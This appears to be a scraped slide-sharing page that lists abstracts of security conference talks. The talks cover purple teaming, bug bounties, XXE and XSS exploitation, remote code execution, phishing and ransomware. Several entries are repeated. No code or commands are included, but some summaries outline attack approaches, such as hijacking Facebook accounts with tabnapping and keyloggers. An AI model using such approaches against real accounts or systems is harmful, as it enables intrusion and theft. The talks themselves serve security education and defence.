This was part of a 3 hour talk for students at a local college. Introductipn to post exploitation with PowerShell Empire. Feel free to use and learn from.
The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
Sector 2016 Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
Power your way to becoming a red team cyber security expertShivamSharma909
Red Teaming is a tradition of rigorously challenging policies, plans, systems, and assumptions by embracing the adversarial approach. Red teams are independent of the organizations. They are only hired by companies when they decide to check their security policies.
https://infosec-train.blogspot.com/2021/08/power-your-way-to-becoming-red-team.html
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts: The Underrated Web-Danger
Testing and Exploiting Backup-File Artifacts with BFAC
BFAC Homepage: https://github.com/mazen160
Blog Post: http://blog.mazinahmed.net/2016/08/backup-file-artifacts.html
The document discusses bug bounty hunting. It introduces Shubham Gupta and Yash Pandya who are security consultants and top bug hunters. It outlines the agenda which includes an introduction to bug bounty programs, reasons for bug hunting, how to find bugs, quick tips, proofs of concept, pros and cons, and a Q&A. It provides a brief history of bug bounty programs and notes that now anyone can participate from home. It discusses types of bugs and tools used for hunting. Quick tips include using Google dorks, testing for information disclosure vulnerabilities, and completing challenges to improve skills. Examples are provided of unique bugs found like SVG XSS and an IDOR issue found in Google.
Drupal, lessons learnt from real world security incidentssydneydrupal
Dr. Pedram Hayati, Security Consultant from Security Dimension covers best-practice recommendations to pro-actively harden and secure Drupal. As well as share a few checks to detect if your Drupal has been already compromised and steps to un-hack your website.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
Sector 2016 Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
Power your way to becoming a red team cyber security expertShivamSharma909
Red Teaming is a tradition of rigorously challenging policies, plans, systems, and assumptions by embracing the adversarial approach. Red teams are independent of the organizations. They are only hired by companies when they decide to check their security policies.
https://infosec-train.blogspot.com/2021/08/power-your-way-to-becoming-red-team.html
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts: The Underrated Web-Danger
Testing and Exploiting Backup-File Artifacts with BFAC
BFAC Homepage: https://github.com/mazen160
Blog Post: http://blog.mazinahmed.net/2016/08/backup-file-artifacts.html
The document discusses bug bounty hunting. It introduces Shubham Gupta and Yash Pandya who are security consultants and top bug hunters. It outlines the agenda which includes an introduction to bug bounty programs, reasons for bug hunting, how to find bugs, quick tips, proofs of concept, pros and cons, and a Q&A. It provides a brief history of bug bounty programs and notes that now anyone can participate from home. It discusses types of bugs and tools used for hunting. Quick tips include using Google dorks, testing for information disclosure vulnerabilities, and completing challenges to improve skills. Examples are provided of unique bugs found like SVG XSS and an IDOR issue found in Google.
Drupal, lessons learnt from real world security incidentssydneydrupal
Dr. Pedram Hayati, Security Consultant from Security Dimension covers best-practice recommendations to pro-actively harden and secure Drupal. As well as share a few checks to detect if your Drupal has been already compromised and steps to un-hack your website.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation.
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
This document discusses 10 different ways to execute code remotely on Windows systems, including native Windows tools like Sysinternals PSExec, methods in Metasploit like PSExec and PSExec-MOF, and other techniques like WMI, PowerShell, and RemCom. Each method is briefly outlined with its positives and negatives. For example, PSExec leaves the PSEXESVC service running but never needs updating, while Metasploit PSExec supports pass-the-hash but some antiviruses may flag the service binary. The document provides an overview of common remote code execution options for pentesters and their relative tradeoffs.
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games?
Worry no longer, the South Korean government got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring!
Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved into the first and, who would have guessed, second penetration test against the "Smart Sheriff" app, will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then?
We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right?
Going over the first and second pentest results we will share our impressions about the "security" of this ecosystem and show examples about the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show, how a simple pentest together with excellent activist work can maybe spark a political discussion and more.
Phishing for clicks is like the VA portion of a Pentest. It feels nice being a hacker, but that fuzzy feeling wears off quickly, once you learn about command and control.
Everyone knows in theory what phishing is, what phishing emails looks like, they even may even theoretically know how it all works.
What about executing a Phishing campaign? This talk will show you the journey of setting up and executing a Phishing campaign to gain command and control. I have tried a few frameworks, coded some pages myself and will show the way I learned to Phish.
This is not just about sending an email and a link, this is about bypassing the email minefield to get the email to the target and having the payload call back out of the network.
We will go through:
Choosing and setting up a Phishing Framework
Cloning a site
Testing delivery and bypassing Spam filters with a payload (Click Once)
Testing different user interactions for executing payloads
Learning different payloads for command and control
Assessing the security posture of a web application is a common project for a penetration tester and a good skill for developers to know. In this talk, We’ll go over the different stages of a web application pen test, from start to finish. We’ll start with tools used during the discovery phase to utilize OSINT sources such as search engines, sub-domain brute-forcing and other methods to help you get a good idea of targets “footprint”, automated scanners and their use, all the way to manual testing and tools used for fuzzing parameters to find potential SQL injection vulnerabilities. We’ll also discuss pro-tips and tricks that we use while conducting a full application penetration assessment. After this talk, you should have a good understanding of what is needed as well as where to start on your journey to hacking web apps.
Putting Rugged Into your DevOps ToolchainJames Wickett
This document discusses the need for "rugged" or hardened security solutions that can withstand adversity as part of a DevOps toolchain and culture. It outlines some past mistakes of the information security field in thinking risk assessment alone was sufficient, not integrating fully with development teams, and more. The document then introduces the Gauntlt tool, which allows security testing to be integrated into the development workflow using easy-to-read tests. Gauntlt helps security and development teams communicate better and adopt a culture of continuous integration and improvement. Example Gauntlt test files in different languages are provided.
This document discusses various free or low-cost security measures organizations can implement, including: using EMET to help prevent exploits; blocking Java user agents at the proxy to prevent Java-based exploits; implementing internal bug bounty programs; deploying port-forwarding honeypots; disabling WPAD; restricting internal DNS lookups; and using "evil canary" decoys to detect intruders. It also emphasizes the importance of monitoring for unusual traffic patterns and authentication events.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
This document discusses insecure direct object references (IDOR), which occur when a developer exposes references like file or database keys without access control. This allows attackers to access unauthorized data by manipulating the references. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using user IDs instead of numeric IDs, and thoroughly reviewing code to prevent IDOR issues.
How to do well in Bug bounty programs. Presentation at @nullhyd by AbhijethAbhijeth D
This is a presentation which talks about how to do well in Bug bounty programs. The slides explain few best practices suggested by top best bug hunters around the world.
For further details about the presentation/suggestions feel free to contact @abhijeth.
Drupal, WordPress, and Joomla are very popular Content Management Systems (CMS) that have been widely adopted by government agencies, major businesses, social networks, and more — underscoring why understanding how these systems work and properly securing these applications is of the utmost importance. This talk focuses on the penetration tester’s perspective of CMS’ and dives into streamlining the assessment and remediation of commonly observed application and configuration flaws by way of custom exploit code and security checklists- all of which are open-source and can be downloaded and implemented following the presentation.
In 2014, Filip managed to exceed our audience's expectations with a well-researched and energizing lecture. Since then, he's managed to build a successful tech startup and has worked for clients across the globe. We are very proud to present you one of the brightest minds on the Czech marketing scene!
Learn hints, tips and tricks from the Twitter Fabric development team, and the principles that guided their creation of this modular and powerful SDK.
Presentation delivered at DroidconNL, Amsterdam, Nov 2014
Thanks to Andrea Falcone and the Fabric team for content and materials. You can see a lightning version of this talk delivered at Twitter Flight here -> https://www.youtube.com/watch?v=3h7jQU1AOvw&index=2&list=PLFKjcMIU2WsjUiy7UcPiWNxktpin0WDgu
Rand Fishkin - The Invisible Giant that Mucks Up Our MarketingMarketing Festival
This document discusses how cultural biases influence marketing decisions and strategies. It argues that common beliefs around gender biases, work hours, startup investments, and marketing channels are influenced by cultural conditioning rather than objective data. The document advocates investing in hard-to-measure marketing channels like word-of-mouth, SEO, and content marketing. It also suggests that search rankings are influenced more by solving user queries than links and keywords. Marketers are advised to consider new ranking factors and search features beyond traditional SEO techniques.
Nowadays REST APIs are behind each mobile and nearly all of web applications. As such they bring a wide range of possibilities in cases of communication and integration with given system. But with great power comes great responsibility. This talk aims to provide general guidance related do API security assessment and covers common API vulnerabilities. We will look at an API interface from the perspective of potential attacker.
I will show:
how to find hidden API interfaces
ways to detect available methods and parameters
fuzzing and pentesting techniques for API calls
typical problems
I will share several interesting cases from public bug bounty reports and personal experience, for example:
* how I got various credentials with one API call
* how to cause DoS by running Garbage Collector from API
This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
This document provides an introduction and overview of cross-site scripting (XSS) attacks. It discusses the impact of XSS, the different types (non-persistent, persistent, DOM-based), how XSS works by injecting client-side code through web requests, and includes demos. The document concludes with recommendations for preventing XSS, including validating and encoding input and output to avoid injecting malicious scripts.
Logs, Logs, Logs - What you need to know to catch a thiefMichael Gough
This will help you get started at Windows logging. What to Enable, Configure, Gather and Harvest to start catching hackers in their tracks.
The Windows Logging Cheat Sheet and SEXY Six Event ID's you MUST monitor and alert on.
The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.
This talk was presented at BSidesLV 2016. It covered the trend of Automating Penetration Testing. We will delve into what this means for skilled penetration testers / exploit developers and the probable outcome of bigger and more breaches.
The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation.
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
This document discusses 10 different ways to execute code remotely on Windows systems, including native Windows tools like Sysinternals PSExec, methods in Metasploit like PSExec and PSExec-MOF, and other techniques like WMI, PowerShell, and RemCom. Each method is briefly outlined with its positives and negatives. For example, PSExec leaves the PSEXESVC service running but never needs updating, while Metasploit PSExec supports pass-the-hash but some antiviruses may flag the service binary. The document provides an overview of common remote code execution options for pentesters and their relative tradeoffs.
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games?
Worry no longer, the South Korean government got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring!
Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved into the first and, who would have guessed, second penetration test against the "Smart Sheriff" app, will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then?
We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right?
Going over the first and second pentest results we will share our impressions about the "security" of this ecosystem and show examples about the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show, how a simple pentest together with excellent activist work can maybe spark a political discussion and more.
Phishing for clicks is like the VA portion of a Pentest. It feels nice being a hacker, but that fuzzy feeling wears off quickly, once you learn about command and control.
Everyone knows in theory what phishing is, what phishing emails looks like, they even may even theoretically know how it all works.
What about executing a Phishing campaign? This talk will show you the journey of setting up and executing a Phishing campaign to gain command and control. I have tried a few frameworks, coded some pages myself and will show the way I learned to Phish.
This is not just about sending an email and a link, this is about bypassing the email minefield to get the email to the target and having the payload call back out of the network.
We will go through:
Choosing and setting up a Phishing Framework
Cloning a site
Testing delivery and bypassing Spam filters with a payload (Click Once)
Testing different user interactions for executing payloads
Learning different payloads for command and control
Assessing the security posture of a web application is a common project for a penetration tester and a good skill for developers to know. In this talk, We’ll go over the different stages of a web application pen test, from start to finish. We’ll start with tools used during the discovery phase to utilize OSINT sources such as search engines, sub-domain brute-forcing and other methods to help you get a good idea of targets “footprint”, automated scanners and their use, all the way to manual testing and tools used for fuzzing parameters to find potential SQL injection vulnerabilities. We’ll also discuss pro-tips and tricks that we use while conducting a full application penetration assessment. After this talk, you should have a good understanding of what is needed as well as where to start on your journey to hacking web apps.
Putting Rugged Into your DevOps ToolchainJames Wickett
This document discusses the need for "rugged" or hardened security solutions that can withstand adversity as part of a DevOps toolchain and culture. It outlines some past mistakes of the information security field in thinking risk assessment alone was sufficient, not integrating fully with development teams, and more. The document then introduces the Gauntlt tool, which allows security testing to be integrated into the development workflow using easy-to-read tests. Gauntlt helps security and development teams communicate better and adopt a culture of continuous integration and improvement. Example Gauntlt test files in different languages are provided.
This document discusses various free or low-cost security measures organizations can implement, including: using EMET to help prevent exploits; blocking Java user agents at the proxy to prevent Java-based exploits; implementing internal bug bounty programs; deploying port-forwarding honeypots; disabling WPAD; restricting internal DNS lookups; and using "evil canary" decoys to detect intruders. It also emphasizes the importance of monitoring for unusual traffic patterns and authentication events.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
This document discusses insecure direct object references (IDOR), which occur when a developer exposes references like file or database keys without access control. This allows attackers to access unauthorized data by manipulating the references. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using user IDs instead of numeric IDs, and thoroughly reviewing code to prevent IDOR issues.
How to do well in Bug bounty programs. Presentation at @nullhyd by AbhijethAbhijeth D
This is a presentation which talks about how to do well in Bug bounty programs. The slides explain few best practices suggested by top best bug hunters around the world.
For further details about the presentation/suggestions feel free to contact @abhijeth.
Drupal, WordPress, and Joomla are very popular Content Management Systems (CMS) that have been widely adopted by government agencies, major businesses, social networks, and more — underscoring why understanding how these systems work and properly securing these applications is of the utmost importance. This talk focuses on the penetration tester’s perspective of CMS’ and dives into streamlining the assessment and remediation of commonly observed application and configuration flaws by way of custom exploit code and security checklists- all of which are open-source and can be downloaded and implemented following the presentation.
In 2014, Filip managed to exceed our audience's expectations with a well-researched and energizing lecture. Since then, he's managed to build a successful tech startup and has worked for clients across the globe. We are very proud to present you one of the brightest minds on the Czech marketing scene!
Learn hints, tips and tricks from the Twitter Fabric development team, and the principles that guided their creation of this modular and powerful SDK.
Presentation delivered at DroidconNL, Amsterdam, Nov 2014
Thanks to Andrea Falcone and the Fabric team for content and materials. You can see a lightning version of this talk delivered at Twitter Flight here -> https://www.youtube.com/watch?v=3h7jQU1AOvw&index=2&list=PLFKjcMIU2WsjUiy7UcPiWNxktpin0WDgu
Rand Fishkin - The Invisible Giant that Mucks Up Our MarketingMarketing Festival
This document discusses how cultural biases influence marketing decisions and strategies. It argues that common beliefs around gender biases, work hours, startup investments, and marketing channels are influenced by cultural conditioning rather than objective data. The document advocates investing in hard-to-measure marketing channels like word-of-mouth, SEO, and content marketing. It also suggests that search rankings are influenced more by solving user queries than links and keywords. Marketers are advised to consider new ranking factors and search features beyond traditional SEO techniques.
Nowadays REST APIs are behind each mobile and nearly all of web applications. As such they bring a wide range of possibilities in cases of communication and integration with given system. But with great power comes great responsibility. This talk aims to provide general guidance related do API security assessment and covers common API vulnerabilities. We will look at an API interface from the perspective of potential attacker.
I will show:
how to find hidden API interfaces
ways to detect available methods and parameters
fuzzing and pentesting techniques for API calls
typical problems
I will share several interesting cases from public bug bounty reports and personal experience, for example:
* how I got various credentials with one API call
* how to cause DoS by running Garbage Collector from API
This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
This document provides an introduction and overview of cross-site scripting (XSS) attacks. It discusses the impact of XSS, the different types (non-persistent, persistent, DOM-based), how XSS works by injecting client-side code through web requests, and includes demos. The document concludes with recommendations for preventing XSS, including validating and encoding input and output to avoid injecting malicious scripts.
Logs, Logs, Logs - What you need to know to catch a thiefMichael Gough
This will help you get started at Windows logging. What to Enable, Configure, Gather and Harvest to start catching hackers in their tracks.
The Windows Logging Cheat Sheet and SEXY Six Event ID's you MUST monitor and alert on.
The recent trend of using Attack and Defense Together.
Due to the recent trend of using offensive and defensive capabilities together, we thought a talk on Purple Teaming would be interesting. We hope to benefit those on the Attack side (red team), Defensive (blue team) and mixing the two.
This talk was presented at BSidesLV 2016. It covered the trend of Automating Penetration Testing. We will delve into what this means for skilled penetration testers / exploit developers and the probable outcome of bigger and more breaches.
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
Average computer users are split into two teams, red and blue, to test their offensive and defensive cybersecurity skills. On the first day, the red team attacks the blue team's network by deploying beacons, exploits, and backdoors while taking down services, while the blue team focuses on understanding and hardening their network. On the second day, the roles are reversed and the blue team goes on the offensive to test the skills they learned from defending against attacks. The event provides benefits to both teams in sharpening their skills through hands-on experience.
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Denim Group
You’ve heard of black, white, and gray box testing? Adding to the security color spectrum, Red Teams (pen testers) working together with Blue Teams (defenders), can improve organizational security and get the most out of security assessments. This talk will discuss both general and specific concepts and techniques to improve penetration tests with coordination of internal security teams. We will discuss high level topics such as knowing what type of assessment is needed for your organization, to more detailed technical concepts such as detecting attack traffic and coordinating with red team attacks. If your internal security team isn't ready for a pentest, lets discuss steps to get your team prepared and ready to fully take advantage of full scope penetration tests. From a pentester perspective, we will discuss the types of testing that is most beneficial to your clients and how to communicate and perform testing activities in conjunction with blue teams. We will also talk about ways to assist the teams with remediation from a 3rd party point of view.
What are the three key points an audience will receive:
· Pen testing techniques on working with internal security
· Internal security techniques for detecting attacks
· Concepts on performing the best type of pen test for your customers
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
A little over a year ago I made the transition from external security consultant to internal offensive security engineer at Facebook. I went from a full time breaker to part time fixer. This talk is aimed at providing lessons learned and documenting the mindset changes I've made over the last year that I feel can be used by the industry as a whole. I've broken the lessons learned into three primary buckets; Red, Blue, and Purple and the talk will hopefully bring value to anyone working in their respective bucket or assist in their creation/continuing of purple teaming at their company.
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013beltface
1. The document discusses building a purple team program by combining knowledge from blue (security) and red (penetration testing) teams. It provides examples of threat modeling, tabletop exercises, and red team exercises performed for two clients.
2. The results and corrective actions from exercises on Client1 are discussed, such as installing Security Onion and Qualys. Building communication and getting management buy-in is advised to start a purple team program.
3. Resources like the Freenode IRC channels #misec and #ladosanostra are provided for learning attack paths and purple team strategies. Doing regular threat modeling, exercises, and assessments is presented as a proactive approach to security.
The document discusses building a home arcade system. It details three attempts using different hardware configurations - a Raspberry Pi, Windows laptop with Maximus Arcade emulator, and potentially a Windows PC with Hyperspin frontend. The Raspberry Pi setup had issues with exiting games without a keyboard. The Maximus Arcade setup on a laptop worked better out of the box but had video card issues. The goal is to build an easy-to-use system for kids to play retro games.
This is the slide deck from a presention for SecTor 2016.
I spoke with Chris Gates @carnal0wnage.
The outline is:
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
DevOps toolchains are transforming modern IT, but hackers can undermine their benefits through poorly implemented or vulnerable DevOps tools. Chris Gates and Ken Johnson will share their collaborative attack research into the technology driving DevOps. They will share an attacker's perspective on exploiting DevOps organizations and the countermeasures these organizations should employ.
RSAC 2017
Ken Johnson & Chris Gates
The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...Tom Limoncelli
A presentation given at PuppetCamp NYC 2014 about why Puppet users should stop storing secrets in Git/Hg and encrypt them instead. TLDR: It enables collaboration.
This talk is about why I believe having the ability to write tools and/or scripts can help elevate a Pen Testers game to the next level.
The talk is case study driven by the different scenarios I've encountered on assessments and the scripts or tools that have been developed as a result.
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationCTruncer
This presentation documents how Egress-Assess can be used on assessments to simulate exfiltrating data over a variety of protocols.
Additionally, this presentation documents the addition of malware modules into Egress-Assess. The new malware modules allow users to emulate different pieces of malware families by using documented malware indicators.
This document provides instructions for accessing blocked websites like Facebook in college networks by using different methods to bypass firewalls and proxies. It explains how to use secure connections, proxy servers, the Tor network and VPNs to anonymously access blocked sites. It also describes setting up an SSH tunnel using PuTTY to create an encrypted tunnel for forwarding requests and browsing privately. Screenshots demonstrate successfully opening Facebook after configuring these techniques on the author's college network.
The document discusses reasons why PCs crash and methods for hacking Facebook accounts.
It provides 5 common reasons for PC crashes: 1) Hardware conflicts where two devices use the same interrupt request channel. 2) Bad RAM such as mismatched chip speeds or parity errors. 3) Improper BIOS settings. 4) Overheating components. 5) Hard drive failures from bad sectors or mechanical issues.
It also describes two methods for hacking Facebook accounts: 1) Using tabnapping to redirect users to a fake login page when they switch browser tabs. 2) Installing a keylogger file on a victim's computer to steal their login credentials. The document provides step-by-step instructions for both hacking methods.
Presented on November 4, 2016 at LASCON (https://lascon2016.sched.com/event/8W7h/honeypy-amp-honeydb). This talk will provide a light intro to honeypots and their benefits, and highlight two projects HoneyPy and HoneyDB. Operating honeypot sensors on your internal network is a simple way to make your network “noisy” and can trip up malicious actors that have already penetrated your network. Also, leveraging data from honeypot sensors on the Internet can be a useful source of threat information.
Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,Sigma Software
This document provides advice for teams working on big data projects. It discusses the importance of knowing and trusting your team members, not over-relying on any single person, being aware of risks posed by the technical platform, learning your product inside and out, and securely handling credentials and access. Specific recommendations include listening to engineers, allowing flexibility in work, having backup plans, experimenting with default settings, monitoring data flows, and using information security best practices like separating code and credentials.
This document provides instructions for various computer-related tasks, some of which could enable harmful behavior. It discusses bypassing security measures, hiding and deleting drives, creating viruses, and cracking software, among other topics. The document warns users not to attempt certain instructions on their own computers due to risk of damage. It also contains links promoting harmful content.
The document discusses PowerShell Empire, a PowerShell post-exploitation framework that aims to provide a flexible and extensible platform for integrating offensive PowerShell capabilities. It provides an overview of Empire's architecture, including its client-server design with a backend database, listeners for command and control, and modules for additional functionality. The document demonstrates Empire's capabilities through modules for process injection, privilege escalation, credential dumping, and lateral movement. It also discusses considerations for detecting and analyzing Empire agents on compromised systems.
This document provides instructions for securely setting up communication tools like Tor and I2P for anonymous browsing and IRC chatting. It recommends installing Tor on Windows, Linux and MacOS, and also installing recommended Firefox add-ons like Adblock Plus and NoScript for increased privacy and security. Detailed steps are provided for installing I2P on Windows and Linux, configuring Firefox as a proxy for I2P, and connecting an IRC client to the I2P network for anonymous chat. The document also describes how to access I2P IRC from an Android device using the Irssi ConnectBot app.
GNUCITIZEN Pdp Owasp Day September 2007guest20ab09
The document discusses potential ways that Web 2.0 technologies could be abused by malicious actors, through five fictional stories. It describes how social networks, APIs, cloud services and other Web 2.0 features could enable new types of malware, spam, botnets and data theft. The stories illustrate techniques like using mashups and feeds to distribute malware, exploiting search and social media to spread worms, using bookmarks for ad-jacking and creating botnets, and abusing aggregators and search engines to conduct reconnaissance. The document warns that legitimate Web 2.0 services could enable large-scale abuse if exploited by attackers.
The document provides instructions for setting up a Python development environment on Ubuntu 14.04. It details installing Python, creating a virtual environment, setting up version control with Git and GitHub, and retrieving code from a GitHub repository to run locally. Key steps include opening a terminal, checking the Python version, installing virtualenv and virtualenvwrapper to create isolated environments, configuring Git, generating an SSH key for GitHub access, cloning a code repository from GitHub, and running the code.
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
The document discusses offensive techniques for compromising embedded devices, focusing on exploiting vulnerabilities in HTTP, UPnP, SNMP, and Wi-Fi to gain remote access. Many examples are provided of specific devices that were compromised through bugs like cross-site request forgery, privilege escalation flaws, and password leaks. The goal of the research is to show how embedded devices are easier to hack than general purpose systems and can be used as stepping stones into internal corporate networks.
This presentation was given to a group of SFS students at GW. It's designed to be semi-case study driven on the problems I've encountered on assessments and how programming can help solve them.
In this slides i have mentioned some hacking tricks which are interesting to know.. You will able to know how the sites are blocked, how to get rid of them.You will also able to crack the passwords...And some useful tricks related to facebook and mobile hacking.. i hope,You will like it...But one thing ,the tricks are old...But what i think is Old is Gold. :p
Building Encrypted APIs with HTTPS and PaillierNicholas Doiron
This document summarizes a presentation about building encrypted APIs with HTTPS and Paillier cryptography. It discusses how HTTPS encrypts web content and verifies website identities with certificates. It also describes tools like Let's Encrypt that can automate obtaining certificates to enable HTTPS on websites. The presentation discusses more advanced HTTPS security settings and explores homomorphic encryption and a crypto-geofence proof-of-concept project that uses partially homomorphic encryption without revealing sensitive location data.
This document provides information about the speaker, including their name, contact information, work experience, projects, and interests. They are a security researcher who previously worked as a VA and now works for HP Application Security Center. They enjoy talking about hacking and drinking beer and gin and tonics. The document also outlines an upcoming workshop they will be conducting on web hacking tools and techniques.
Ransomware - what is it, how to protect against itZoltan Balazs
This document provides biographical information about the author and discusses various topics related to ransomware, including notable ransomware families, encryption methods, prevention and recovery strategies. The author describes themselves as the creator of several hacking tools and concepts later adopted by cybercriminals. The document offers advice on ransomware prevention both for home and enterprise users, including tips on backups, application control, and making systems appear like a malware analyst's to avoid targeting.
Introduction to Just in Time Access - BrightTalkHaydn Johnson
